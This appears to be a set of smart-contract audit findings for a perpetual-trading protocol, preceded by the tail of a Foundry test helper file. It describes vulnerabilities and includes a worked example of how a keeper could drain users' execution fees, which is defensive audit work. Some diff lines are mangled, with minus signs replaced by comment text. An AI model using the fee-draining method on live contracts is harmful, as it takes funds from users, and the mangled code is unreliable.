signatures\\n bytes[] memory signatures = new bytes[](18);\\n for(uint i; i<18; i++){\\n signatures[i] = abi.encode(""SIGNATURE"");\\n }\\n address[] memory priceFeedTokens;\\n\\n OracleUtils.SetPricesParams memory priceParams = OracleUtils.SetPricesParams(\\n signerInfo,\\n tokens,\\n compactedMinOracleBlockNumbers,\\n compactedMaxOracleBlockNumbers,\\n compactedOracleTimestamps,\\n compactedDecimals,\\n compactedMinPrices, \\n compactedMinPricesIndexes,\\n compactedMaxPrices, \\n compactedMaxPricesIndexes, \\n signatures, \\n 
priceFeedTokens\\n );\\n return priceParams;\\n}\\n\\n/* \\n* The current index token price (85, 90), a trader sets a trigger price to 100 and then acceptabiel price to 95.\\n* He like to long the index token. \\n* 1. Pick the primary price 90 since we long, so choose the max\\n* 2. Make sure 90 < 100, and pick (90, 100) as the custom price since we long\\n* 3. Choose price 95 since 95 is within the range, and it is the highest acceptible price. Choosing 90 \\n* will be in favor of the trader\\n* \\n*/\\n\\nfunction createMarketSwapOrder(address account, address inputToken, uint256 inAmount) public returns(bytes32)\\n{ \\n address[] memory swapPath = new address[](1);\\n swapPath[0] = _marketProps1.marketToken;\\n // swapPath[0] = _marketPropsAB.marketToken;\\n // swapPath[1] = _marketPropsBC.marketToken;\\n // swapPath[2] = _marketPropsCwnt.marketToken;\\n\\n \\n vm.prank(account); \\n _wnt.transfer(address(_orderVault), 3200); // execution fee\\n\\n\\n BaseOrderUtils.CreateOrderParams memory params;\\n params.addresses.receiver = account; // the account is the receiver\\n params.addresses.callbackContract = address(0);\\n params.addresses.uiFeeReceiver = account; // set myself as the ui receiver\\n // params.addresses.market = marketToken;\\n params.addresses.initialCollateralToken = inputToken; // initial token\\n params.addresses.swapPath = swapPath;\\n\\n // params.numbers.sizeDeltaUsd = sizeDeltaUsd;\\n params.numbers.initialCollateralDeltaAmount = inAmount ; // this is actually useless, will be overidden by real transfer amount\\n vm.prank(account); \\n IERC20(inputToken).transfer(address(_orderVault), inAmount); // this is the real amount\\n\\n\\n // params.numbers.triggerPrice = triggerPrice;\\n // params.numbers.acceptablePrice = acceptablePrice; // I can buy with this price or lower effective spread control \\n params.numbers.executionFee = 3200;\\n params.numbers.callbackGasLimit = 3200;\\n // params.numbers.initialCollateralDeltaAmount = inAmount;\\n 
params.numbers.minOutputAmount = 100; // use the control the final collateral amount, not for the position size delta, which is indirectly controlled by acceptable price\\n\\n params.orderType = Order.OrderType.MarketSwap;\\n params.decreasePositionSwapType = Order.DecreasePositionSwapType.NoSwap;\\n // params.isLong = isLong;\\n params.shouldUnwrapNativeToken = false;\\n params.referralCode = keccak256(abi.encode(""MY REFERRAL""));\\n\\n vm.prank(account);\\n bytes32 key = _erouter.createOrder(params);\\n return key;\\n}\\n\\n\\n\\nfunction createLiquidationOrder(address account, address marketToken, address collateralToken, uint256 collateralAmount, uint sizeDeltaUsd, uint triggerPrice, uint256 acceptablePrice, bool isLong) public returns(bytes32)\\n{\\n address[] memory swapPath;\\n \\n //address[] memory swapPath = new address[](3);\\n //swapPath[0] = _marketPropsAB.marketToken;\\n //swapPath[1] = _marketPropsBC.marketToken;\\n //swapPath[2] = _marketPropsCwnt.marketToken;\\n\\n \\n vm.prank(account); \\n _wnt.transfer(address(_orderVault), 3200); // execution fee\\n\\n\\n BaseOrderUtils.CreateOrderParams memory params;\\n params.addresses.receiver = account;\\n params.addresses.callbackContract = address(0);\\n params.addresses.uiFeeReceiver = uiFeeReceiver;\\n params.addresses.market = marketToken; // final market\\n params.addresses.initialCollateralToken = collateralToken; // initial token\\n params.addresses.swapPath = swapPath;\\n\\n params.numbers.sizeDeltaUsd = sizeDeltaUsd;\\n // params.numbers.initialCollateralDeltaAmount = ; // this is actually useless, will be overidden by real transfer amount\\n vm.prank(account); \\n IERC20(collateralToken).transfer(address(_orderVault), collateralAmount); // this is the real amount\\n\\n\\n params.numbers.triggerPrice = triggerPrice;\\n params.numbers.acceptablePrice = acceptablePrice; // I can buy with this price or lower effective spread control \\n params.numbers.executionFee = 3200;\\n 
params.numbers.callbackGasLimit = 3200;\\n params.numbers.minOutputAmount = 100; // use the control the final collateral amount, not for the position size delta, which is indirectly controlled by acceptable price\\n\\n params.orderType = Order.OrderType.Liquidation;\\n params.decreasePositionSwapType = Order.DecreasePositionSwapType.NoSwap;\\n params.isLong = isLong;\\n params.shouldUnwrapNativeToken = false;\\n params.referralCode = keccak256(abi.encode(""MY REFERRAL""));\\n\\n vm.prank(account);\\n bytes32 key = _erouter.createOrder(params);\\n return key;\\n} \\n\\n\\n\\nfunction createStopLossDecrease(address account, address marketToken, address collateralToken, uint256 collateralAmount, uint sizeDeltaUsd, uint triggerPrice, uint256 acceptablePrice, bool isLong) public returns(bytes32)\\n{\\n address[] memory swapPath;\\n \\n //address[] memory swapPath = new address[](3);\\n //swapPath[0] = _marketPropsAB.marketToken;\\n //swapPath[1] = _marketPropsBC.marketToken;\\n //swapPath[2] = _marketPropsCwnt.marketToken;\\n\\n \\n vm.prank(account); \\n _wnt.transfer(address(_orderVault), 3200); // execution fee\\n\\n\\n BaseOrderUtils.CreateOrderParams memory params;\\n params.addresses.receiver = account;\\n params.addresses.callbackContract = address(0);\\n params.addresses.uiFeeReceiver = uiFeeReceiver;\\n params.addresses.market = marketToken; // final market\\n params.addresses.initialCollateralToken = collateralToken; // initial token\\n params.addresses.swapPath = swapPath;\\n\\n params.numbers.sizeDeltaUsd = sizeDeltaUsd;\\n // params.numbers.initialCollateralDeltaAmount = ; // this is actually useless, will be overidden by real transfer amount\\n vm.prank(account); \\n IERC20(collateralToken).transfer(address(_orderVault), collateralAmount); // this is the real amount\\n\\n\\n params.numbers.triggerPrice = triggerPrice;\\n params.numbers.acceptablePrice = acceptablePrice; // I can buy with this price or lower effective spread control \\n 
params.numbers.executionFee = 3200;\\n params.numbers.callbackGasLimit = 3200;\\n params.numbers.minOutputAmount = 100; // use the control the final collateral amount, not for the position size delta, which is indirectly controlled by acceptable price\\n\\n params.orderType = Order.OrderType.StopLossDecrease;\\n params.decreasePositionSwapType = Order.DecreasePositionSwapType.NoSwap;\\n params.isLong = isLong;\\n params.shouldUnwrapNativeToken = false;\\n params.referralCode = keccak256(abi.encode(""MY REFERRAL""));\\n\\n vm.prank(account);\\n bytes32 key = _erouter.createOrder(params);\\n return key;\\n} \\n\\n\\n\\nfunction createLimitDecreaseOrder(address account, address marketToken, address collateralToken, uint256 collateralAmount, uint sizeDeltaUsd, uint triggerPrice, uint256 acceptablePrice, bool isLong) public returns(bytes32)\\n{\\n address[] memory swapPath;\\n \\n //address[] memory swapPath = new address[](3);\\n //swapPath[0] = _marketPropsAB.marketToken;\\n //swapPath[1] = _marketPropsBC.marketToken;\\n //swapPath[2] = _marketPropsCwnt.marketToken;\\n\\n \\n vm.prank(account); \\n _wnt.transfer(address(_orderVault), 3200); // execution fee\\n\\n\\n BaseOrderUtils.CreateOrderParams memory params;\\n params.addresses.receiver = account;\\n params.addresses.callbackContract = address(0);\\n params.addresses.uiFeeReceiver = uiFeeReceiver;\\n params.addresses.market = marketToken; // final market\\n params.addresses.initialCollateralToken = collateralToken; // initial token\\n params.addresses.swapPath = swapPath;\\n\\n params.numbers.sizeDeltaUsd = sizeDeltaUsd;\\n // params.numbers.initialCollateralDeltaAmount = ; // this is actually useless, will be overidden by real transfer amount\\n vm.prank(account); \\n IERC20(collateralToken).transfer(address(_orderVault), collateralAmount); // this is the real amount\\n\\n\\n params.numbers.triggerPrice = triggerPrice;\\n params.numbers.acceptablePrice = acceptablePrice; // I can buy with this price or lower 
effective spread control \\n params.numbers.executionFee = 3200;\\n params.numbers.callbackGasLimit = 3200;\\n params.numbers.minOutputAmount = 100; // use the control the final collateral amount, not for the position size delta, which is indirectly controlled by acceptable price\\n\\n params.orderType = Order.OrderType.LimitDecrease;\\n params.decreasePositionSwapType = Order.DecreasePositionSwapType.NoSwap;\\n params.isLong = isLong;\\n params.shouldUnwrapNativeToken = false;\\n params.referralCode = keccak256(abi.encode(""MY REFERRAL""));\\n\\n vm.prank(account);\\n bytes32 key = _erouter.createOrder(params);\\n return key;\\n} \\n\\n\\nfunction createLimitIncreaseOrder(address account, address marketToken, address collateralToken, uint256 collateralAmount, uint sizeDeltaUsd, uint triggerPrice, bool isLong) public returns(bytes32)\\n{\\n address[] memory swapPath;\\n \\n //address[] memory swapPath = new address[](3);\\n //swapPath[0] = _marketPropsAB.marketToken;\\n //swapPath[1] = _marketPropsBC.marketToken;\\n //swapPath[2] = _marketPropsCwnt.marketToken;\\n\\n \\n vm.prank(account); \\n _wnt.transfer(address(_orderVault), 3200); // execution fee\\n\\n\\n BaseOrderUtils.CreateOrderParams memory params;\\n params.addresses.receiver = account;\\n params.addresses.callbackContract = address(0);\\n params.addresses.uiFeeReceiver = uiFeeReceiver;\\n params.addresses.market = marketToken; // final market\\n params.addresses.initialCollateralToken = collateralToken; // initial token\\n params.addresses.swapPath = swapPath;\\n\\n params.numbers.sizeDeltaUsd = sizeDeltaUsd;\\n // params.numbers.initialCollateralDeltaAmount = ; // this is actually useless, will be overidden by real transfer amount\\n vm.prank(account); \\n IERC20(collateralToken).transfer(address(_orderVault), collateralAmount); // this is the real amount\\n\\n\\n params.numbers.triggerPrice = triggerPrice; // used for limit order\\n params.numbers.acceptablePrice = 121000000000000; // I can buy with 
this price or lower effective spread control \\n params.numbers.executionFee = 3200;\\n params.numbers.callbackGasLimit = 3200;\\n params.numbers.minOutputAmount = 100; // use the control the final collateral amount, not for the position size delta, which is indirectly controlled by acceptable price\\n\\n params.orderType = Order.OrderType.LimitIncrease;\\n params.decreasePositionSwapType = Order.DecreasePositionSwapType.NoSwap;\\n params.isLong = isLong;\\n params.shouldUnwrapNativeToken = false;\\n params.referralCode = keccak256(abi.encode(""MY REFERRAL""));\\n\\n vm.prank(account);\\n bytes32 key = _erouter.createOrder(params);\\n return key;\\n} \\n\\n\\n\\n\\nfunction createMarketDecreaseOrder(address account, address marketToken, address collateralToken, uint256 acceptablePrice, uint256 sizeInUsd, bool isLong) public returns(bytes32)\\n{\\n address[] memory swapPath;\\n \\n //address[] memory swapPath = new address[](3);\\n //swapPath[0] = _marketPropsAB.marketToken;\\n //swapPath[1] = _marketPropsBC.marketToken;\\n //swapPath[2] = _marketPropsCwnt.marketToken;\\n\\n \\n vm.prank(account); \\n _wnt.transfer(address(_orderVault), 3200); // execution fee\\n\\n\\n BaseOrderUtils.CreateOrderParams memory params;\\n params.addresses.receiver = account;\\n params.addresses.callbackContract = address(0);\\n params.addresses.uiFeeReceiver = uiFeeReceiver;\\n params.addresses.market = marketToken; // final market\\n params.addresses.initialCollateralToken = collateralToken; // initial token\\n params.addresses.swapPath = swapPath;\\n\\n params.numbers.sizeDeltaUsd = sizeInUsd; // how much dollar to decrease, will convert into amt of tokens to decrease in long/short based on the execution price\\n params.numbers.initialCollateralDeltaAmount = 13e18; // this is actually useless, will be overidden by real transfer amount\\n // vm.prank(account); \\n // IERC20(collateralToken).transfer(address(_orderVault), collateralAmount); // this is the real amount\\n\\n\\n 
params.numbers.triggerPrice = 0;\\n params.numbers.acceptablePrice = acceptablePrice; // I can buy with this price or lower effective spread control \\n params.numbers.executionFee = 3200;\\n params.numbers.callbackGasLimit = 3200;\\n params.numbers.minOutputAmount = 10e18; // use the control the final collateral amount, not for the position size delta, which is indirectly controlled by acceptable price\\n\\n params.orderType = Order.OrderType.MarketDecrease;\\n params.decreasePositionSwapType = Order.DecreasePositionSwapType.NoSwap;\\n params.isLong = isLong;\\n params.shouldUnwrapNativeToken = false;\\n params.referralCode = keccak256(abi.encode(""MY REFERRAL""));\\n\\n vm.prank(account);\\n bytes32 key = _erouter.createOrder(params);\\n return key;\\n} \\n\\n\\n\\nfunction createMarketIncreaseOrder(address account, address marketToken, address collateralToken, uint256 collateralAmount, uint sizeDeltaUsd, uint acceptablePrice, bool isLong) public returns(bytes32)\\n{\\n address[] memory swapPath;\\n \\n //address[] memory swapPath = new address[](3);\\n //swapPath[0] = _marketPropsAB.marketToken;\\n //swapPath[1] = _marketPropsBC.marketToken;\\n //swapPath[2] = _marketPropsCwnt.marketToken;\\n\\n \\n vm.prank(account); \\n _wnt.transfer(address(_orderVault), 3200); // execution fee\\n\\n\\n BaseOrderUtils.CreateOrderParams memory params;\\n params.addresses.receiver = account;\\n params.addresses.callbackContract = address(0);\\n params.addresses.uiFeeReceiver = uiFeeReceiver;\\n params.addresses.market = marketToken; // final market\\n params.addresses.initialCollateralToken = collateralToken; // initial token\\n params.addresses.swapPath = swapPath;\\n\\n params.numbers.sizeDeltaUsd = sizeDeltaUsd;\\n // params.numbers.initialCollateralDeltaAmount = ; // this is actually useless, will be overidden by real transfer amount\\n vm.prank(account); \\n IERC20(collateralToken).transfer(address(_orderVault), collateralAmount); // this is the real amount\\n\\n\\n 
params.numbers.triggerPrice = 0;\\n params.numbers.acceptablePrice = acceptablePrice; // I can buy with this price or lower effective spread control \\n params.numbers.executionFee = 3200;\\n params.numbers.callbackGasLimit = 3200;\\n params.numbers.minOutputAmount = 100; // use the control the final collateral amount, not for the position size delta, which is indirectly controlled by acceptable price\\n\\n params.orderType = Order.OrderType.MarketIncrease;\\n params.decreasePositionSwapType = Order.DecreasePositionSwapType.NoSwap;\\n params.isLong = isLong;\\n params.shouldUnwrapNativeToken = false;\\n params.referralCode = keccak256(abi.encode(""MY REFERRAL""));\\n\\n vm.prank(account);\\n bytes32 key = _erouter.createOrder(params);\\n return key;\\n} \\n\\n\\n\\nfunction createWithdraw(address withdrawor, uint marketTokenAmount) public returns (bytes32)\\n{\\n address[] memory longTokenSwapPath;\\n address[] memory shortTokenSwapPath;\\n\\n console.log(""createWithdraw with withdrawor: "");\\n console.logAddress(withdrawor);\\n vm.prank(withdrawor); \\n _wnt.transfer(address(_withdrawalVault), 3200); // execution fee\\n\\n vm.prank(withdrawor);\\n ERC20(_marketProps1.marketToken).transfer(address(_withdrawalVault), marketTokenAmount);\\n\\n WithdrawalUtils.CreateWithdrawalParams memory params = WithdrawalUtils.CreateWithdrawalParams(\\n withdrawor, // receiver\\n address(0), // call back function\\n uiFeeReceiver, // uiFeeReceiver\\n _marketProps1.marketToken, // which market token to withdraw\\n longTokenSwapPath,\\n shortTokenSwapPath,\\n 123, // minLongTokenAmount\\n 134, // minShortTokenAmount\\n false, // shouldUnwrapNativeToken\\n 3200, // execution fee\\n 3200 // callback gas limit\\n );\\n\\n vm.prank(withdrawor);\\n bytes32 key = _erouter.createWithdrawal(params);\\n return key;\\n}\\n\\n\\nfunction createDepositNoSwap(Market.Props memory marketProps, address depositor, uint amount, bool isLong) public returns (bytes32){\\n address[] memory 
longTokenSwapPath;\\n address[] memory shortTokenSwapPath;\\n\\n console.log(""createDeposit with depositor: "");\\n console.logAddress(depositor);\\n\\n vm.prank(depositor);\\n _wnt.transfer(address(_depositVault), 3200); // execution fee\\n if(isLong){\\n console2.log(""000000000000000000"");\\n vm.prank(depositor);\\n IERC20(marketProps.longToken).transfer(address(_depositVault), amount); \\n console2.log(""bbbbbbbbbbbbbbbbbbbbbb"");\\n }\\n else {\\n console2.log(""111111111111111111111111"");\\n console2.log(""deposit balance: %d, %d"", IERC20(marketProps.shortToken).balanceOf(depositor), amount);\\n vm.prank(depositor);\\n IERC20(marketProps.shortToken).transfer(address(_depositVault), amount);\\n console2.log(""qqqqqqqqqqqqqqqqqq"");\\n }\\n \\n\\n DepositUtils.CreateDepositParams memory params = DepositUtils.CreateDepositParams(\\n depositor,\\n address(0),\\n uiFeeReceiver,\\n marketProps.marketToken,\\n marketProps.longToken,\\n marketProps.shortToken,\\n longTokenSwapPath,\\n shortTokenSwapPath,\\n 100000, // minMarketTokens\\n true,\\n 3200, // execution fee\\n 3200 // call back gas limit\\n );\\n\\n console2.log(""aaaaaaaaaaaaaaaaaaaaaaaaa"");\\n vm.prank(depositor);\\n bytes32 key1 = _erouter.createDeposit(params);\\n\\n return key1;\\n}\\n\\n/*\\nfunction testCancelDeposit() public \\n{\\n address[] memory longTokenSwapPath;\\n address[] memory shortTokenSwapPath;\\n\\n address(_wnt).call{value: 100e8}("""");\\n _wnt.transfer(address(_depositVault), 1e6);\\n DepositUtils.CreateDepositParams memory params = DepositUtils.CreateDepositParams(\\n msg.sender,\\n address(0),\\n address(111),\\n _marketProps1.marketToken,\\n _marketProps1.longToken,\\n _marketProps1.shortToken,\\n longTokenSwapPath,\\n shortTokenSwapPath,\\n 100000, // minMarketTokens\\n true,\\n 3200, // execution fee\\n 3200 // call back gas limit\\n );\\n\\n bytes32 key1 = _erouter.createDeposit(params);\\n\\n console.log(""WNT balance of address(222) before cancelllation: %s"", 
_wnt.balanceOf(address(222)));\\n console.log(""WNT balance of address(this) before cancelllation: %s"", _wnt.balanceOf(address(this))); \\n\\n _roleStore.grantRole(address(222), Role.CONTROLLER); // to save a market's props\\n vm.prank(address(222));\\n _depositHandler.cancelDeposit(key1);\\n console.log(""WNT balance of address(222) after cancelllation: %s"", _wnt.balanceOf(address(222)));\\n console.log(""WNT balance of address(this) after cancelllation: %s"", _wnt.balanceOf(address(this))); \\n}\\n*/\\n\\nfunction testERC165() public{\\n bool yes = _wnt.supportsInterface(type(IWNT).interfaceId);\\n console2.log(""wnt suppports deposit?"");\\n console2.logBool(yes);\\n vm.expectRevert();\\n yes = IERC165(address(_sol)).supportsInterface(type(IWNT).interfaceId);\\n console2.logBool(yes);\\n\\n if(ERC165Checker.supportsERC165(address(_wnt))){\\n console2.log(""_wnt supports ERC165"");\\n }\\n if(ERC165Checker.supportsERC165(address(_sol))){\\n console2.log(""_sol supports ERC165"");\\n }\\n}\\n\\n function justError() external {\\n // revert Unauthorized(""abcdefg""); // 973d02cb\\n // revert(""abcdefg""); // 0x08c379a, Error selector\\n // require(false, ""abcdefg""); // 0x08ce79a, Error selector\\n assert(3 == 4); // Panic: 0x4e487b71\\n }\\n\\n function testErrorMessage() public{\\n\\n try this.justError(){} \\n catch (bytes memory reasonBytes) {\\n (string memory msg, bool ok ) = ErrorUtils.getRevertMessage(reasonBytes);\\n console2.log(""Error Message: ""); console2.logString(msg);\\n console2.log(""error?""); console2.logBool(ok);\\n } \\n }\\n\\n \\n function printAddresses() public{\\n console2.log(""_orderVault:""); console2.logAddress(address(_orderVault));\\n console2.log(""marketToken:""); console2.logAddress(address(_marketProps1.marketToken));\\n } \\n\\n function printPoolsAmounts() public{\\n console2.log(""\\n The summary of pool amounts: "");\\n \\n uint256 amount = MarketUtils.getPoolAmount(_dataStore, _marketProps1, _marketProps1.longToken);\\n 
console2.log(""Market: _marketProps1, token: long/nwt, amount: %d"", amount);\\n amount = MarketUtils.getPoolAmount(_dataStore, _marketProps1, _marketProps1.shortToken);\\n console2.log(""Market: _marketProps1, token: short/USDC, amount: %d"", amount);\\n \\n amount = MarketUtils.getPoolAmount(_dataStore, _marketPropsAB, _marketPropsAB.longToken);\\n console2.log(""Market: _marketPropsAB, token: long/A, amount: %d"", amount);\\n amount = MarketUtils.getPoolAmount(_dataStore, _marketPropsAB, _marketPropsAB.shortToken);\\n console2.log(""Market: _marketPropsAB, token: short/B, amount: %d"", amount);\\n \\n amount = MarketUtils.getPoolAmount(_dataStore, _marketPropsBC, _marketPropsBC.longToken);\\n console2.log(""Market: _marketPropsBC, token: long/B, amount:%d"", amount);\\n amount = MarketUtils.getPoolAmount(_dataStore, _marketPropsBC, _marketPropsBC.shortToken);\\n console2.log(""Market: _marketPropsBC, token: short/C, amount: %d"", amount);\\n \\n amount = MarketUtils.getPoolAmount(_dataStore, _marketPropsCwnt, _marketPropsCwnt.longToken);\\n console2.log(""Market: _marketPropsCwnt, token: long/C, amount: %d"", amount);\\n amount = MarketUtils.getPoolAmount(_dataStore, _marketPropsCwnt, _marketPropsCwnt.shortToken);\\n console2.log(""Market: _marketPropsCwnt, token: short/wnt, amount: %d"", amount);\\n \\n\\n console2.log(""\\n"");\\n }\\n \\n}\\n```\\n" +short side of getReservedUsd does not work for market that has the same collateral token,medium,"short side of getReservedUsd does not work for market that has the same collateral token\\nConsider the case of ETH / USD market with both long and short collateral token as ETH.\\nthe available amount to be reserved (ETH) would CHANGE with the price of ETH.\\n```\\n function getReservedUsd(\\n DataStore dataStore,\\n Market.Props memory market,\\n MarketPrices memory prices,\\n bool isLong\\n ) internal view returns (uint256) {\\n uint256 reservedUsd;\\n if (isLong) {\\n // for longs calculate the reserved USD based 
on the open interest and current indexTokenPrice\\n // this works well for e.g. an ETH / USD market with long collateral token as WETH\\n // the available amount to be reserved would scale with the price of ETH\\n // this also works for e.g. a SOL / USD market with long collateral token as WETH\\n // if the price of SOL increases more than the price of ETH, additional amounts would be\\n // automatically reserved\\n uint256 openInterestInTokens = getOpenInterestInTokens(dataStore, market, isLong);\\n reservedUsd = openInterestInTokens * prices.indexTokenPrice.max;\\n } else {\\n // for shorts use the open interest as the reserved USD value\\n // this works well for e.g. an ETH / USD market with short collateral token as USDC\\n // the available amount to be reserved would not change with the price of ETH\\n reservedUsd = getOpenInterest(dataStore, market, isLong);\\n }\\n\\n return reservedUsd;\\n }\\n```\\n",Consider apply both long and short calculations of reserveUsd with relation to the indexTokenPrice.,reservedUsd does not work when long and short collateral tokens are the same.,"```\\n function getReservedUsd(\\n DataStore dataStore,\\n Market.Props memory market,\\n MarketPrices memory prices,\\n bool isLong\\n ) internal view returns (uint256) {\\n uint256 reservedUsd;\\n if (isLong) {\\n // for longs calculate the reserved USD based on the open interest and current indexTokenPrice\\n // this works well for e.g. an ETH / USD market with long collateral token as WETH\\n // the available amount to be reserved would scale with the price of ETH\\n // this also works for e.g. 
a SOL / USD market with long collateral token as WETH\\n // if the price of SOL increases more than the price of ETH, additional amounts would be\\n // automatically reserved\\n uint256 openInterestInTokens = getOpenInterestInTokens(dataStore, market, isLong);\\n reservedUsd = openInterestInTokens * prices.indexTokenPrice.max;\\n } else {\\n // for shorts use the open interest as the reserved USD value\\n // this works well for e.g. an ETH / USD market with short collateral token as USDC\\n // the available amount to be reserved would not change with the price of ETH\\n reservedUsd = getOpenInterest(dataStore, market, isLong);\\n }\\n\\n return reservedUsd;\\n }\\n```\\n" +Keepers can steal additional execution fee from users,medium,"The implementation of `payExecutionFee()` didn't take EIP-150 into consideration, a malicious keeper can exploit it to drain out all execution fee users have paid, regardless of the actual execution cost.\\nThe issue arises on `L55` of `payExecutionFee()`, as it's an `external` function, callingpayExecutionFee() is subject to EIP-150. Only `63/64` gas is passed to the `GasUtils` sub-contract(external library), and the remaing `1/64` gas is reserved in the caller contract which will be refunded to keeper(msg.sender) after the execution of the whole transaction. 
But calculation of `gasUsed` includes this portion of the cost as well.\\n```\\nFile: contracts\\gas\\GasUtils.sol\\n function payExecutionFee(\\n DataStore dataStore,\\n EventEmitter eventEmitter,\\n StrictBank bank,\\n uint256 executionFee,\\n uint256 startingGas,\\n address keeper,\\n address user\\n ) external { // @audit external call is subject to EIP// Remove the line below\\n150\\n// Remove the line below\\n uint256 gasUsed = startingGas // Remove the line below\\n gasleft();\\n// Add the line below\\n uint256 gasUsed = startingGas // Remove the line below\\n gasleft() * 64 / 63; // @audit the correct formula\\n uint256 executionFeeForKeeper = adjustGasUsage(dataStore, gasUsed) * tx.gasprice;\\n\\n if (executionFeeForKeeper > executionFee) {\\n executionFeeForKeeper = executionFee;\\n }\\n\\n bank.transferOutNativeToken(\\n keeper,\\n executionFeeForKeeper\\n );\\n\\n emitKeeperExecutionFee(eventEmitter, keeper, executionFeeForKeeper);\\n\\n uint256 refundFeeAmount = executionFee // Remove the line below\\n executionFeeForKeeper;\\n if (refundFeeAmount == 0) {\\n return;\\n }\\n\\n bank.transferOutNativeToken(\\n user,\\n refundFeeAmount\\n );\\n\\n emitExecutionFeeRefund(eventEmitter, user, refundFeeAmount);\\n }\\n```\\n\\nA malicious keeper can exploit this issue to drain out all execution fee, regardless of the actual execution cost. 
Let's take `executeDeposit()` operation as an example to show how it works:\\n```\\nFile: contracts\\exchange\\DepositHandler.sol\\n function executeDeposit(\\n bytes32 key,\\n OracleUtils.SetPricesParams calldata oracleParams\\n ) external\\n globalNonReentrant\\n onlyOrderKeeper\\n withOraclePrices(oracle, dataStore, eventEmitter, oracleParams)\\n {\\n uint256 startingGas = gasleft();\\n\\n try this._executeDeposit(\\n key,\\n oracleParams,\\n msg.sender\\n ) {\\n } catch (bytes memory reasonBytes) {\\n// rest of code\\n }\\n }\\n\\nFile: contracts\\exchange\\DepositHandler.sol\\n function _executeDeposit(\\n bytes32 key,\\n OracleUtils.SetPricesParams memory oracleParams,\\n address keeper\\n ) external onlySelf {\\n uint256 startingGas = gasleft();\\n// rest of code\\n\\n ExecuteDepositUtils.executeDeposit(params);\\n }\\n\\n\\nFile: contracts\\deposit\\ExecuteDepositUtils.sol\\n function executeDeposit(ExecuteDepositParams memory params) external {\\n// rest of code\\n\\n GasUtils.payExecutionFee(\\n params.dataStore,\\n params.eventEmitter,\\n params.depositVault,\\n deposit.executionFee(),\\n params.startingGas,\\n params.keeper,\\n deposit.account()\\n );\\n }\\n\\nFile: contracts\\gas\\GasUtils.sol\\n function payExecutionFee(\\n DataStore dataStore,\\n EventEmitter eventEmitter,\\n StrictBank bank,\\n uint256 executionFee,\\n uint256 startingGas,\\n address keeper,\\n address user\\n ) external {\\n uint256 gasUsed = startingGas - gasleft();\\n uint256 executionFeeForKeeper = adjustGasUsage(dataStore, gasUsed) * tx.gasprice;\\n\\n if (executionFeeForKeeper > executionFee) {\\n executionFeeForKeeper = executionFee;\\n }\\n\\n bank.transferOutNativeToken(\\n keeper,\\n executionFeeForKeeper\\n );\\n\\n emitKeeperExecutionFee(eventEmitter, keeper, executionFeeForKeeper);\\n\\n uint256 refundFeeAmount = executionFee - executionFeeForKeeper;\\n if (refundFeeAmount == 0) {\\n return;\\n }\\n\\n bank.transferOutNativeToken(\\n user,\\n refundFeeAmount\\n 
);\\n\\n emitExecutionFeeRefund(eventEmitter, user, refundFeeAmount);\\n }\\n\\nFile: contracts\\gas\\GasUtils.sol\\n function adjustGasUsage(DataStore dataStore, uint256 gasUsed) internal view returns (uint256) {\\n// rest of code\\n uint256 baseGasLimit = dataStore.getUint(Keys.EXECUTION_GAS_FEE_BASE_AMOUNT);\\n// rest of code\\n uint256 multiplierFactor = dataStore.getUint(Keys.EXECUTION_GAS_FEE_MULTIPLIER_FACTOR);\\n uint256 gasLimit = baseGasLimit + Precision.applyFactor(gasUsed, multiplierFactor);\\n return gasLimit;\\n }\\n```\\n\\nTo simplify the problem, given\\n```\\nEXECUTION_GAS_FEE_BASE_AMOUNT = 0\\nEXECUTION_GAS_FEE_MULTIPLIER_FACTOR = 1\\nexecutionFeeUserHasPaid = 200K Gwei\\ntx.gasprice = 1 Gwei\\nactualUsedGas = 100K\\n```\\n\\n`actualUsedGas` is the gas cost since startingGas(L146 of DepositHandler.sol) but before calling payExecutionFee()(L221 of ExecuteDepositUtils.sol)\\nLet's say, the keeper sets `tx.gaslimit` to make\\n```\\nstartingGas = 164K\\n```\\n\\nThen the calculation of `gasUsed`, L55 of `GasUtils.sol`, would be\\n```\\nuint256 gasUsed = startingGas - gasleft() = 164K - (164K - 100K) * 63 / 64 = 101K\\n```\\n\\nand\\n```\\nexecutionFeeForKeeper = 101K * tx.gasprice = 101K * 1 Gwei = 101K Gwei\\nrefundFeeForUser = 200K - 101K = 99K Gwei\\n```\\n\\nAs setting of `tx.gaslimit` doesn't affect the actual gas cost of the whole transaction, the excess gas will be refunded to `msg.sender`. Now, the keeper increases `tx.gaslimit` to make `startingGas = 6500K`, the calculation of `gasUsed` would be\\n```\\nuint256 gasUsed = startingGas - gasleft() = 6500K - (6500K - 100K) * 63 / 64 = 200K\\n```\\n\\nand\\n```\\nexecutionFeeForKeeper = 200K * tx.gasprice = 200K * 1 Gwei = 200K Gwei\\nrefundFeeForUser = 200K - 200K = 0 Gwei\\n```\\n\\nWe can see the keeper successfully drain out all execution fee, the user gets nothing refunded.","The description in `Vulnerability Detail` section has been simplified. 
In fact, `gasleft` value should be adjusted after each external call during the whole call stack, not just in `payExecutionFee()`.",Keepers can steal additional execution fee from users.,"```\\nFile: contracts\\gas\\GasUtils.sol\\n function payExecutionFee(\\n DataStore dataStore,\\n EventEmitter eventEmitter,\\n StrictBank bank,\\n uint256 executionFee,\\n uint256 startingGas,\\n address keeper,\\n address user\\n ) external { // @audit external call is subject to EIP// Remove the line below\\n150\\n// Remove the line below\\n uint256 gasUsed = startingGas // Remove the line below\\n gasleft();\\n// Add the line below\\n uint256 gasUsed = startingGas // Remove the line below\\n gasleft() * 64 / 63; // @audit the correct formula\\n uint256 executionFeeForKeeper = adjustGasUsage(dataStore, gasUsed) * tx.gasprice;\\n\\n if (executionFeeForKeeper > executionFee) {\\n executionFeeForKeeper = executionFee;\\n }\\n\\n bank.transferOutNativeToken(\\n keeper,\\n executionFeeForKeeper\\n );\\n\\n emitKeeperExecutionFee(eventEmitter, keeper, executionFeeForKeeper);\\n\\n uint256 refundFeeAmount = executionFee // Remove the line below\\n executionFeeForKeeper;\\n if (refundFeeAmount == 0) {\\n return;\\n }\\n\\n bank.transferOutNativeToken(\\n user,\\n refundFeeAmount\\n );\\n\\n emitExecutionFeeRefund(eventEmitter, user, refundFeeAmount);\\n }\\n```\\n" +An Oracle Signer can never be removed even if he becomes malicious,medium,"The call flow of removeOracleSIgner incorrectly compares the hash of (""removeOracleSigner"", account) with the hash of (""addOracleSigner"", account) for validating that an action is actually initiated. This validation always fails because the hashes can never match.\\nThe process of removing oracle signers is 2 stage. 
